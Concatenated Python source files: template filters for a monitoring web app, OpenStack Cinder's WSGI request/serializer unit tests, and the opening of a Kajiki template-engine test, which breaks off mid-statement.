return "over %d years" % (round(distance_in_minutes / 525600))
# Custom filters
def time_in_words(value):
'''
Usage: {{ my_date_variable|time_in_words }}
'''
# if DateTimeFiled() or datetime.datetime variable
try:
time_ago = age(value)
except:
null_time = time()
time_ago = age(datetime.combine(value, null_time))
return time_ago
def date_to_js(value, format='%Y, %m, %d, %H, %M'):
# Converts unixtime to a javascript Date list
_ = datetime.utcfromtimestamp(value)
js_time_list = _.strftime(format).split(',')
# Substract one month in js January is 0, February is 1, etc.
js_time_list[1] = str(int(js_time_list[1])-1)
return ",".join(js_time_list)
def to_int(value):
number = re.compile('(\d+)')
try:
_int = number.search(value).group(1)
except:
_int = 0
return int(_int)
# TODO - write tests
def extract_days_from_unixdate(value, days):
day = 86400 # 1 day in seconds
return value-(day*days)
# Removes the letters from a string
# From 24.5MB -> 24.5 -> used in the progress width
def clean_string(variable):
if isinstance(variable, int)\
or isinstance(variable, float)\
or isinstance(variable, long):
variable = float(variable) if not isinstance(variable, float) else variable
return variable
else:
value_regex = re.compile(r'\d+[\.,]\d+')
extracted_value = value_regex.findall(variable)
if len(extracted_value) > 0:
extracted_value = extracted_value[0]
extracted_value.replace(",",".")
extracted_value = float(extracted_value)
else:
extracted_value = 0
return extracted_value
# Used in the charts, where a disk drive could be with several slashes
def clean_slashes(string):
return re.sub('[^A-Za-z0-9]+', '', string).strip().lower()
def check_additional_data(list_with_dicts):
valid_keys = ['occurrence']
for dict in list_with_dicts:
for key in dict.keys():
if key not in valid_keys:
return True
# Combine several parameters with /
# Used in the base_url -> {{ base_url|url('system',) -> http://host/system
def url(*args):
http_slash = '/'
url = http_slash.join(args)
return url
def beautify_json(value):
if isinstance(value, dict):
return json.dumps(value, indent=4) # Remove the unicode symbol
else:
return value
# Used in the log page. Displays the expand button if the value is dictionary
def is_dict(value):
if isinstance(value, dict):
return True
else:
return False
# Used in the log page. Checks the log tag
def is_str(value):
if isinstance(value, str) or isinstance(value, unicode):
return True
else:
return False
def get_active_page(value, key):
elements = value.split(':')
try:
return elements[key]
except:
return None
# url -> usually the base url -> http://something.com
# params_dict -> dict {"tags": ['test', 'some'], "other_param": ['test']}
def query_dict(url, params_dict, page=None):
query_lists = []
for dict in params_dict:
dict_items = []
values_list = params_dict[dict]
if values_list:
for value in values_list:
dict_items.append("{0}={1}".format(dict, value))
# Join all the values
query_lists.append("&".join(dict_items))
# Finally separate the different params with ?
query_string = url
if len(query_lists) > 0:
query_string+='?'
query_string+= "?".join(query_lists)
if page != None:
query_string+="&page={0}".format(page)
# No params - only the page number
else:
if page != None:
query_string+="?page={0}".format(page)
return query_string
def base_url():
if settings.PROXY is None:
host = settings.WEB_APP['host']
port = settings.WEB_APP['port']
base_url = "{0}:{1}".format(host, port)
return base_url
else:
return ''
# Removes the scientific notation and displays floats normally
def format_float(value):
return format(float(value), "g")
# Converts bytes in megabytes
def to_mb(value):
value = value/(1024*1024)
return "{0:.2F}MB".format(float(value))
def dehumanize(value):
values_dict = {
"more_than": ">",
"less_than": "<",
"minute": "1 minute",
"five_minutes": "5 minutes",
"fifteen_minutes": "15 minutes"
}
try:
_value = values_dict[value]
except:
_value = ''
return _value
# Gets the key from a dictionary, doesn't break the template
def get_key(dict, key):
value = dict.get(key, None)
return value
def render(template, *args, **kwargs):
env = Environment(loader=FileSystemLoader(TEMPLATES_DIR),
extensions=[SelectiveHTMLCompress])
env.globals['base_url'] = base_url()
env.globals['version'] = __version__
env.filters['url'] = url
# Used everywhere
env.filters['time'] = timeformat
env.filters['date_to_js'] = date_to_js
env.filters['date'] = dateformat
env.filters['date_local'] = dateformat_local
env.filters['to_int'] = to_int
env.filters['time_in_words'] = time_in_words
env.filters['test_additional_data'] = check_additional_data
env.filters['clean_slashes'] = clean_slashes
env.filters['beautify_json'] = beautify_json
env.filters['get_active_page'] = get_active_page # Used to mark links as active
env.filters['extract_days_from_unixdate'] = extract_days_from_unixdate
# Dashboard filters
env.filters['format_float'] = format_float
# Log filters
env.filters['is_dict'] = is_dict
env.filters['is_str'] = is_str
env.filters['query_dict'] = query_dict
# Settings
env.filters['dehumanize'] = dehumanize
env.filters['to_mb'] = to_mb
# ACL
# Utilities
env.filters['get_key'] = get_key
try:
template = env.get_template(template)
except Exception, e:
raise
# Global variables
env.globals['acl'] = settings.ACL
return template.render(*args, **kwargs)
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import webob
from cinder.api.openstack import wsgi
from cinder import exception
from cinder import test
from cinder.tests.unit.api import fakes
class RequestTest(test.TestCase):
def test_content_type_missing(self):
request = wsgi.Request.blank('/tests/123', method='POST')
request.body = "<body />"
self.assertIsNone(request.get_content_type())
def test_content_type_unsupported(self):
request = wsgi.Request.blank('/tests/123', method='POST')
request.headers["Content-Type"] = "text/html"
request.body = "asdf<br />"
self.assertRaises(exception.InvalidContentType,
request.get_content_type)
def test_content_type_with_charset(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Content-Type"] = "application/json; charset=UTF-8"
result = request.get_content_type()
self.assertEqual("application/json", result)
def test_content_type_from_accept(self):
for content_type in ('application/xml',
'application/vnd.openstack.volume+xml',
'application/json',
'application/vnd.openstack.volume+json'):
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = content_type
result = request.best_match_content_type()
self.assertEqual(content_type, result)
def test_content_type_from_accept_best(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = "application/xml, application/json"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = ("application/json; q=0.3, "
"application/xml; q=0.9")
result = request.best_match_content_type()
self.assertEqual("application/xml", result)
def test_content_type_from_query_extension(self):
request = wsgi.Request.blank('/tests/123.xml')
result = request.best_match_content_type()
self.assertEqual("application/xml", result)
request = wsgi.Request.blank('/tests/123.json')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123.invalid')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_accept_and_query_extension(self):
request = wsgi.Request.blank('/tests/123.xml')
request.headers["Accept"] = "application/json"
result = request.best_match_content_type()
self.assertEqual("application/xml", result)
def test_content_type_accept_default(self):
request = wsgi.Request.blank('/tests/123.unsupported')
request.headers["Accept"] = "application/unsupported1"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_best_match_language(self):
# Test that we are actually invoking language negotiation by webob
request = wsgi.Request.blank('/')
accepted = 'unknown-lang'
request.headers = {'Accept-Language': accepted}
def fake_best_match(self, offers, default_match=None):
# Match would return None, if requested lang is not found
return None
self.stubs.SmartSet(request.accept_language,
'best_match', fake_best_match)
self.assertIsNone(request.best_match_language())
# If accept-language is not included or empty, match should be None
request.headers = {'Accept-Language': ''}
self.assertIsNone(request.best_match_language())
request.headers.pop('Accept-Language')
self.assertIsNone(request.best_match_language())
def test_cache_and_retrieve_resources(self):
request = wsgi.Request.blank('/foo')
# Test that trying to retrieve a cached object on
# an empty cache fails gracefully
self.assertIsNone(request.cached_resource())
self.assertIsNone(request.cached_resource_by_id('r-0'))
resources = []
for x in range(3):
resources.append({'id': 'r-%s' % x})
# Cache an empty list of resources using the default name
request.cache_resource([])
self.assertEqual({}, request.cached_resource())
self.assertIsNone(request.cached_resource('r-0'))
# Cache some resources
request.cache_resource(resources[:2])
# Cache one resource
request.cache_resource(resources[2])
# Cache a different resource name
other_resource = {'id': 'o-0'}
request.cache_resource(other_resource, name='other-resource')
self.assertEqual(resources[0], request.cached_resource_by_id('r-0'))
self.assertEqual(resources[1], request.cached_resource_by_id('r-1'))
self.assertEqual(resources[2], request.cached_resource_by_id('r-2'))
self.assertIsNone(request.cached_resource_by_id('r-3'))
self.assertEqual({'r-0': resources[0],
'r-1': resources[1],
'r-2': resources[2]}, request.cached_resource())
self.assertEqual(other_resource,
request.cached_resource_by_id('o-0',
name='other-resource'))
def test_cache_and_retrieve_volumes(self):
self._test_cache_and_retrieve_resources('volume')
def test_cache_and_retrieve_volume_types(self):
self._test_cache_and_retrieve_resources('volume_type')
def test_cache_and_retrieve_snapshots(self):
self._test_cache_and_retrieve_resources('snapshot')
def test_cache_and_retrieve_backups(self):
self._test_cache_and_retrieve_resources('backup')
def _test_cache_and_retrieve_resources(self, resource_name):
"""Generic helper for cache tests."""
cache_all_func = 'cache_db_%ss' % resource_name
cache_one_func = 'cache_db_%s' % resource_name
get_db_all_func = 'get_db_%ss' % resource_name
get_db_one_func = 'get_db_%s' % resource_name
r = wsgi.Request.blank('/foo')
resources = []
for x in range(3):
resources.append({'id': 'id%s' % x})
# Store 2
getattr(r, cache_all_func)(resources[:2])
# Store 1
getattr(r, cache_one_func)(resources[2])
self.assertEqual(resources[0], getattr(r, get_db_one_func)('id0'))
self.assertEqual(resources[1], getattr(r, get_db_one_func)('id1'))
self.assertEqual(resources[2], getattr(r, get_db_one_func)('id2'))
self.assertIsNone(getattr(r, get_db_one_func)('id3'))
self.assertEqual({'id0': resources[0],
'id1': resources[1],
'id2': resources[2]}, getattr(r, get_db_all_func)())
class ActionDispatcherTest(test.TestCase):
def test_dispatch(self):
serializer = wsgi.ActionDispatcher()
serializer.create = lambda x: 'pants'
self.assertEqual('pants', serializer.dispatch({}, action='create'))
def test_dispatch_action_None(self):
serializer = wsgi.ActionDispatcher()
serializer.create = lambda x: 'pants'
serializer.default = lambda x: 'trousers'
self.assertEqual('trousers', serializer.dispatch({}, action=None))
def test_dispatch_default(self):
serializer = wsgi.ActionDispatcher()
serializer.create = lambda x: 'pants'
serializer.default = lambda x: 'trousers'
self.assertEqual('trousers', serializer.dispatch({}, action='update'))
class DictSerializerTest(test.TestCase):
def test_dispatch_default(self):
serializer = wsgi.DictSerializer()
self.assertEqual('', serializer.serialize({}, 'update'))
class XMLDictSerializerTest(test.TestCase):
def test_xml(self):
input_dict = dict(servers=dict(a=(2, 3)))
expected_xml = '<serversxmlns="asdf"><a>(2,3)</a></servers>'
serializer = wsgi.XMLDictSerializer(xmlns="asdf")
result = serializer.serialize(input_dict)
result = result.replace('\n', '').replace(' ', '')
self.assertEqual(expected_xml, result)
class JSONDictSerializerTest(test.TestCase):
def test_json(self):
input_dict = dict(servers=dict(a=(2, 3)))
expected_json = '{"servers":{"a":[2,3]}}'
serializer = wsgi.JSONDictSerializer()
result = serializer.serialize(input_dict)
result = result.replace('\n', '').replace(' ', '')
self.assertEqual(expected_json, result)
class TextDeserializerTest(test.TestCase):
def test_dispatch_default(self):
deserializer = wsgi.TextDeserializer()
self.assertEqual({}, deserializer.deserialize({}, 'update'))
class JSONDeserializerTest(test.TestCase):
def test_json(self):
data = """{"a": {
"a1": "1",
"a2": "2",
"bs": ["1", "2", "3", {"c": {"c1": "1"}}],
"d": {"e": "1"},
"f": "1"}}"""
as_dict = {
'body': {
'a': {
'a1': '1',
'a2': '2',
'bs': ['1', '2', '3', {'c': {'c1': '1'}}],
'd': {'e': '1'},
'f': '1',
},
},
}
deserializer = wsgi.JSONDeserializer()
self.assertEqual(as_dict, deserializer.deserialize(data))
class XMLDeserializerTest(test.TestCase):
def test_xml(self):
xml = """
<a a1="1" a2="2">
<bs><b>1</b><b>2</b><b>3</b><b><c c1="1"/></b></bs>
<d><e>1</e></d>
<f>1</f>
</a>
""".strip()
as_dict = {
'body': {
'a': {
'a1': '1',
'a2': '2',
'bs': ['1', '2', '3', {'c': {'c1': '1'}}],
'd': {'e': '1'},
'f': '1',
},
},
}
metadata = {'plurals': {'bs': 'b', 'ts': 't'}}
deserializer = wsgi.XMLDeserializer(metadata=metadata)
self.assertEqual(as_dict, deserializer.deserialize(xml))
def test_xml_empty(self):
xml = """<a></a>"""
as_dict = {"body": {"a": {}}}
deserializer = wsgi.XMLDeserializer()
self.assertEqual(as_dict, deserializer.deserialize(xml))
class MetadataXMLDeserializerTest(test.TestCase):
def test_xml_meta_parsing_special_character(self):
"""Test XML meta parsing with special characters.
Test that when a SaxParser splits a string containing special
characters into multiple childNodes there are no issues extracting
the text.
"""
meta_xml_str = """
<metadata>
<meta key="key3">value&3</meta>
<meta key="key2">value2</meta>
<meta key="key1">value1</meta>
</metadata>
""".strip()
meta_expected = {'key1': 'value1',
'key2': 'value2',
'key3': 'value&3'}
meta_deserializer = wsgi.MetadataXMLDeserializer()
document = wsgi.utils.safe_minidom_parse_string(meta_xml_str)
root_node = document.childNodes[0]
meta_extracted = meta_deserializer.extract_metadata(root_node)
self.assertEqual(meta_expected, meta_extracted)
class ResourceTest(test.TestCase):
def test_resource_call(self):
class Controller(object):
def index(self, req):
return 'off'
req = webob.Request.blank('/tests')
app = fakes.TestRouter(Controller())
response = req.get_response(app)
self.assertEqual('off', response.body)
self.assertEqual(200, response.status_int)
def test_resource_not_authorized(self):
class Controller(object):
def index(self, req):
raise exception.NotAuthorized()
req = webob.Request.blank('/tests')
app = fakes.TestRouter(Controller())
response = req.get_response(app)
self.assertEqual(403, response.status_int)
def test_dispatch(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(None, 'index', None, '')
actual = resource.dispatch(method, None, {'pants': 'off'})
expected = 'off'
self.assertEqual(expected, actual)
def test_get_method_undefined_controller_action(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(AttributeError, resource.get_method,
None, 'create', None, '')
def test_get_method_action_json(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(None, 'action',
'application/json',
'{"fooAction": true}')
self.assertEqual(controller._action_foo, method)
def test_get_method_action_xml(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(
None, 'action', 'application/xml', '<fooAction>true</fooAction>')
self.assertEqual(controller._action_foo, method)
def test_get_method_action_bad_body(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(exception.MalformedRequestBody, resource.get_method,
None, 'action', 'application/json', '{}')
def test_get_method_unknown_controller_action(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(KeyError, resource.get_method,
None, 'action', 'application/json',
'{"barAction": true}')
def test_get_method_action_method(self):
class Controller(object):
def action(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(None, 'action',
'application/xml',
'<fooAction>true</fooAction')
self.assertEqual(controller.action, method)
def test_get_action_args(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
env = {
'wsgiorg.routing_args': [None, {
'controller': None,
'format': None,
'action': 'update',
'id': 12,
}],
}
expected = {'action': 'update', 'id': 12}
self.assertEqual(expected, resource.get_action_args(env))
def test_get_body_bad_content(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.headers['Content-Type'] = 'application/none'
request.body = 'foo'
content_type, body = resource.get_body(request)
self.assertIsNone(content_type)
self.assertEqual('', body)
def test_get_body_no_content_type(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.body = 'foo'
content_type, body = resource.get_body(request)
self.assertIsNone(content_type)
self.assertEqual('', body)
def test_get_body_no_content_body(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.headers['Content-Type'] = 'application/json'
request.body = ''
content_type, body = resource.get_body(request)
self.assertIsNone(content_type)
self.assertEqual('', body)
def test_get_body(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.headers['Content-Type'] = 'application/json'
request.body = 'foo'
content_type, body = resource.get_body(request)
self.assertEqual('application/json', content_type)
self.assertEqual('foo', body)
def test_deserialize_badtype(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(exception.InvalidContentType,
resource.deserialize,
controller.index, 'application/none', 'foo')
def test_deserialize_default(self):
class JSONDeserializer(object):
def deserialize(self, body):
return 'json'
class XMLDeserializer(object):
def deserialize(self, body):
return 'xml'
class Controller(object):
@wsgi.deserializers(xml=XMLDeserializer)
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller, json=JSONDeserializer)
obj = resource.deserialize(controller.index, 'application/json', 'foo')
self.assertEqual('json', obj)
def test_deserialize_decorator(self):
class JSONDeserializer(object):
def deserialize(self, body):
return 'json'
class XMLDeserializer(object):
def deserialize(self, body):
return 'xml'
class Controller(object):
@wsgi.deserializers(xml=XMLDeserializer)
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller, json=JSONDeserializer)
obj = resource.deserialize(controller.index, 'application/xml', 'foo')
self.assertEqual('xml', obj)
def test_register_actions(self):
class Controller(object):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
@wsgi.action('barAction')
def _action_bar(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
self.assertEqual({}, resource.wsgi_actions)
extended = ControllerExtended()
resource.register_actions(extended)
self.assertEqual({'fooAction': extended._action_foo,
'barAction': extended._action_bar, },
resource.wsgi_actions)
def test_register_extensions(self):
class Controller(object):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.extends
def index(self, req, resp_obj, pants=None):
return None
@wsgi.extends(action='fooAction')
def _action_foo(self, req, resp, id, body):
return None
controller = Controller()
resource = wsgi.Resource(controller)
self.assertEqual({}, resource.wsgi_extensions)
self.assertEqual({}, resource.wsgi_action_extensions)
extended = ControllerExtended()
resource.register_extensions(extended)
self.assertEqual({'index': [extended.index]}, resource.wsgi_extensions)
self.assertEqual({'fooAction': [extended._action_foo]},
resource.wsgi_action_extensions)
def test_get_method_extensions(self):
class Controller(object):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.extends
def index(self, req, resp_obj, pants=None):
return None
controller = Controller()
extended = ControllerExtended()
resource = wsgi.Resource(controller)
resource.register_extensions(extended)
method, extensions = resource.get_method(None, 'index', None, '')
self.assertEqual(controller.index, method)
self.assertEqual([extended.index], extensions)
def test_get_method_action_extensions(self):
class Controller(wsgi.Controller):
def index(self, req, pants=None):
return pants
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
class ControllerExtended(wsgi.Controller):
@wsgi.extends(action='fooAction')
def _action_foo(self, req, resp_obj, id, body):
return None
controller = Controller()
extended = ControllerExtended()
resource = wsgi.Resource(controller)
resource.register_extensions(extended)
method, extensions = resource.get_method(None, 'action',
'application/json',
'{"fooAction": true}')
self.assertEqual(controller._action_foo, method)
self.assertEqual([extended._action_foo], extensions)
def test_get_method_action_whitelist_extensions(self):
class Controller(wsgi.Controller):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.action('create')
def _create(self, req, body):
pass
@wsgi.action('delete')
def _delete(self, req, id):
pass
controller = Controller()
extended = ControllerExtended()
resource = wsgi.Resource(controller)
resource.register_actions(extended)
method, extensions = resource.get_method(None, 'create',
'application/json',
'{"create": true}')
self.assertEqual(extended._create, method)
self.assertEqual([], extensions)
method, extensions = resource.get_method(None, 'delete', None, None)
self.assertEqual(extended._delete, method)
self.assertEqual([], extensions)
def test_pre_process_extensions_regular(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return None
def extension2(req, resp_obj):
called.append(2)
return None
extensions = [extension1, extension2]
response, post = resource.pre_process_extensions(extensions, None, {})
self.assertEqual([], called)
self.assertIsNone(response)
self.assertEqual([extension2, extension1], list(post))
def test_pre_process_extensions_generator(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
called.append('pre1')
yield
called.append('post1')
def extension2(req):
called.append('pre2')
yield
called.append('post2')
extensions = [extension1, extension2]
response, post = resource.pre_process_extensions(extensions, None, {})
post = list(post)
self.assertEqual(['pre1', 'pre2'], called)
self.assertIsNone(response)
self.assertEqual(2, len(post))
self.assertTrue(inspect.isgenerator(post[0]))
self.assertTrue(inspect.isgenerator(post[1]))
for gen in post:
try:
gen.send(None)
except StopIteration:
continue
self.assertEqual(['pre1', 'pre2', 'post2', 'post1'], called)
def test_pre_process_extensions_generator_response(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
called.append('pre1')
yield 'foo'
def extension2(req):
called.append('pre2')
extensions = [extension1, extension2]
response, post = resource.pre_process_extensions(extensions, None, {})
self.assertEqual(['pre1'], called)
self.assertEqual('foo', response)
self.assertEqual([], post)
def test_post_process_extensions_regular(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return None
def extension2(req, resp_obj):
called.append(2)
return None
response = resource.post_process_extensions([extension2, extension1],
None, None, {})
self.assertEqual([2, 1], called)
self.assertIsNone(response)
def test_post_process_extensions_regular_response(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return None
def extension2(req, resp_obj):
called.append(2)
return 'foo'
response = resource.post_process_extensions([extension2, extension1],
None, None, {})
self.assertEqual([2], called)
self.assertEqual('foo', response)
def test_post_process_extensions_version_not_found(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return 'bar'
def extension2(req, resp_obj):
raise exception.VersionNotFoundForAPIMethod(version='fake_version')
response = resource.post_process_extensions([extension2, extension1],
None, None, {})
self.assertEqual([1], called)
self.assertEqual('bar', response)
def test_post_process_extensions_generator(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
yield
called.append(1)
def extension2(req):
yield
called.append(2)
ext1 = extension1(None)
next(ext1)
ext2 = extension2(None)
next(ext2)
response = resource.post_process_extensions([ext2, ext1],
None, None, {})
self.assertEqual([2, 1], called)
self.assertIsNone(response)
def test_post_process_extensions_generator_response(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
yield
called.append(1)
def extension2(req):
yield
called.append(2)
yield 'foo'
ext1 = extension1(None)
next(ext1)
ext2 = extension2(None)
next(ext2)
response = resource.post_process_extensions([ext2, ext1],
None, None, {})
self.assertEqual([2], called)
self.assertEqual('foo', response)
class ResponseObjectTest(test.TestCase):
def test_default_code(self):
robj = wsgi.ResponseObject({})
self.assertEqual(200, robj.code)
def test_modified_code(self):
robj = wsgi.ResponseObject({})
robj._default_code = 202
self.assertEqual(202, robj.code)
def test_override_default_code(self):
robj = wsgi.ResponseObject({}, code=404)
self.assertEqual(404, robj.code)
def test_override_modified_code(self):
robj = wsgi.ResponseObject({}, code=404)
robj._default_code = 202
self.assertEqual(404, robj.code)
def test_set_header(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
self.assertEqual({'header': 'foo'}, robj.headers)
def test_get_header(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
self.assertEqual('foo', robj['hEADER'])
def test_del_header(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
del robj['hEADER']
self.assertNotIn('header', robj.headers)
def test_header_isolation(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
hdrs = robj.headers
hdrs['hEADER'] = 'bar'
self.assertEqual('foo', robj['hEADER'])
def test_default_serializers(self):
robj = wsgi.ResponseObject({})
self.assertEqual({}, robj.serializers)
def test_bind_serializers(self):
robj = wsgi.ResponseObject({}, json='foo')
robj._bind_method_serializers(dict(xml='bar', json='baz'))
self.assertEqual(dict(xml='bar', json='foo'), robj.serializers)
def test_get_serializer(self):
robj = wsgi.ResponseObject({}, json='json', xml='xml', atom='atom')
for content_type, mtype in wsgi._MEDIA_TYPE_MAP.items():
_mtype, serializer = robj.get_serializer(content_type)
self.assertEqual(mtype, serializer)
def test_get_serializer_defaults(self):
robj = wsgi.ResponseObject({})
default_serializers = dict(json='json', xml='xml', atom='atom')
for content_type, mtype in wsgi._MEDIA_TYPE_MAP.items():
self.assertRaises(exception.InvalidContentType,
robj.get_serializer, content_type)
_mtype, serializer = robj.get_serializer(content_type,
default_serializers)
self.assertEqual(mtype, serializer)
def test_serialize(self):
class JSONSerializer(object):
def serialize(self, obj):
return 'json'
class XMLSerializer(object):
def serialize(self, obj):
return 'xml'
class AtomSerializer(object):
def serialize(self, obj):
return 'atom'
robj = wsgi.ResponseObject({}, code=202,
json=JSONSerializer,
xml=XMLSerializer,
atom=AtomSerializer)
robj['X-header1'] = 'header1'
robj['X-header2'] = 'header2'
for content_type, mtype in wsgi._MEDIA_TYPE_MAP.items():
request = wsgi.Request.blank('/tests/123')
response = robj.serialize(request, content_type)
self.assertEqual(content_type, response.headers['Content-Type'])
self.assertEqual('header1', response.headers['X-header1'])
self.assertEqual('header2', response.headers['X-header2'])
self.assertEqual(202, response.status_int)
self.assertEqual(mtype, response.body)
class ValidBodyTest(test.TestCase):
def setUp(self):
super(ValidBodyTest, self).setUp()
self.controller = wsgi.Controller()
def test_is_valid_body(self):
body = {'foo': {}}
self.assertTrue(self.controller.is_valid_body(body, 'foo'))
def test_is_valid_body_none(self):
wsgi.Resource(controller=None)
self.assertFalse(self.controller.is_valid_body(None, 'foo'))
def test_is_valid_body_empty(self):
wsgi.Resource(controller=None)
self.assertFalse(self.controller.is_valid_body({}, 'foo'))
def test_is_valid_body_no_entity(self):
wsgi.Resource(controller=None)
body = {'bar': {}}
self.assertFalse(self.controller.is_valid_body(body, 'foo'))
def test_is_valid_body_malformed_entity(self):
wsgi.Resource(controller=None)
body = {'foo': 'bar'}
self.assertFalse(self.controller.is_valid_body(body, 'foo'))
def test_validate_string_length_with_name_too_long(self):
name = 'a' * 256
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_string_length,
name, 'Name', min_length=1, max_length=255,
remove_whitespaces=False)
def test_validate_string_length_with_name_contains_white_spaces(
self):
body = {'name': 'a' * 255 + " "}
self.controller.validate_string_length(
body['name'], 'name', min_length=1, max_length=255,
remove_whitespaces=True)
def test_validate_name_and_description_with_name_too_long(self):
body = {'name': 'a' * 256}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_desc_too_long(self):
body = {'description': 'a' * 256}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_name_as_int(self):
body = {'name': 1234}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_desc_as_int(self):
body = {'description': 1234}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_name_zero_length(self):
# NOTE(jdg): We allow zero length names currently, particularly
# from Nova, changes to this require an API version bump
body = {'name': ""}
self.controller.validate_name_and_description(body)
self.assertEqual('', body['name'])
def test_validate_name_and_description_with_desc_zero_length(self):
body = {'description': ""}
self.controller.validate_name_and_description(body)
self.assertEqual('', body['description'])
def test_validate_name_and_description_with_name_contains_white_spaces(
self):
body = {'name': 'a' * 255 + " "}
self.controller.validate_name_and_description(body)
self.assertEqual('a' * 255, body['name'])
def test_validate_integer_greater_than_max_int_limit(self):
value = (2 ** 31) + 1
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_integer,
value, 'limit', min_value=-1, max_value=(2 ** 31))
def test_validate_integer_less_than_min_int_limit(self):
value = -12
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_integer,
value, 'limit', min_value=-1, max_value=(2 ** 31))
def test_validate_integer_invalid_limit(self):
value = "should_be_int"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_integer,
value, 'limit', min_value=-1, max_value=(2 ** 31))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from unittest import TestCase, main
import kajiki
from kajiki import ir
class TestBasic(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'__main__()',
ir.TextNode('Hello, '),
ir.ExprNode('name'),
ir.TextNode('\n'))])
def test(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict(name='Rick')).render()
assert rsp == 'Hello, Rick\n', rsp
class TestSwitch(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'__main__()',
ir.ForNode(
'i in range(2)',
ir.ExprNode('i'),
ir.TextNode(' is '),
ir.SwitchNode(
